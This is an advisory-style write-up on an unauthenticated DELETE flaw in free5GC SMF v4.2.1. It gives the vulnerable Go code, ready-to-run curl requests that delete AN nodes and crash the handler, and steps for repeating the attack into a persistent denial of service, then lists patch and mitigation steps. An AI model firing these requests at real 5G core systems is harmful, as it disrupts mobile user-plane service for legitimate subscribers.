Listen to this Post
How the CVE works:
The SMF mounts the `/upi` route group without OAuth2 middleware, unlike protected `/nsmf-oam` which returns 401. An unauthenticated attacker sends DELETE /upi/v1/upNodesLinks/gNB1. The handler checks `upNode.Type == UPNODE_UPF` – if false (AN‑typed node has no UPF object), it skips async release but still executes `UpNodeDelete(upNodeRef)` (mutates in‑memory topology) and then `upNode.UPF.CancelAssociation()` on a nil pointer. The panic occurs after the topology change, leaving the SMF state corrupted. The same request can be repeated for any AN entry, causing persistent denial of user‑plane management. The vulnerability exists because the nil dereference is unconditional after the type guard, and the route group lacks authentication entirely. The official Docker image `free5gc/smf:v4.2.1` (commit 8385c00a) is affected. Proof: curl -X DELETE http://10.100.200.6:8000/upi/v1/upNodesLinks/gNB1` returns 500 and logs show topology mutation before panic. The sibling OAM endpoint returns 401, proving auth is missing only on UPI.
<h2 style="color: blue;">dailycve form:</h2>
Platform: free5GC SMF
Version: v4.2.1
Vulnerability: Auth bypass + nil deref
Severity: Critical
date: 2026-03-22
<h2 style="color: blue;">Prediction: Patch expected April 2026</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Check if SMF endpoint is vulnerable (no token)
curl -i http://SMF_IP:8000/nsmf-oam/v1/
Expected: 401 Unauthorized
Trigger the panic-DoS on AN node 'gNB1'
curl -i -X DELETE http://SMF_IP:8000/upi/v1/upNodesLinks/gNB1
Returns 500 Internal Server Error
View SMF logs to confirm panic and topology mutation
docker logs --tail 50 smf | grep -E "Deleting it|panic|nil pointer"
Code snippet showing vulnerable lines (api_upi.go:94-99)
if upNode.Type == smf_context.UPNODE_UPF {
go s.Processor().ReleaseAllResourcesOfUPF(upNode.UPF)
}
upi.UpNodeDelete(upNodeRef)
upNode.UPF.CancelAssociation() PANIC when upNode.UPF == nil
<h2 style="color: blue;">Exploit:</h2>
Send unauthenticated DELETE requests to any known AN node reference (e.g.,gNB1,gNB2`) via the UPI endpoint. The SMF will remove that node from its in‑memory topology and crash the handler goroutine, disrupting UPF selection and PFCP path establishment for legitimate UEs. No token, session, or UE state required. The exploit works from any network position that can reach the SMF SBI port (default 8000).
Protection from this CVE:
Upgrade to fixed commit (free5gc/smf199) or apply patch that adds OAuth2 middleware to `/upi` group and moves `UpNodeDelete` after the nil check. Temporarily restrict network access to SMF SBI port (8000) to trusted management hosts. Alternatively, disable the UPI route group by recompiling without `api_upi.go` if not needed.
Impact:
- Confidentiality: None.
- Integrity: Attacker can delete arbitrary AN/UPF entries from SMF’s user‑plane topology, corrupting in‑memory state.
- Availability: Repeated requests cause persistent DoS of SMF’s ability to manage user‑plane paths. The panic is recovered per request but leaves topology mutated, requiring manual restore. Off‑path network attacker can exploit without authentication.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
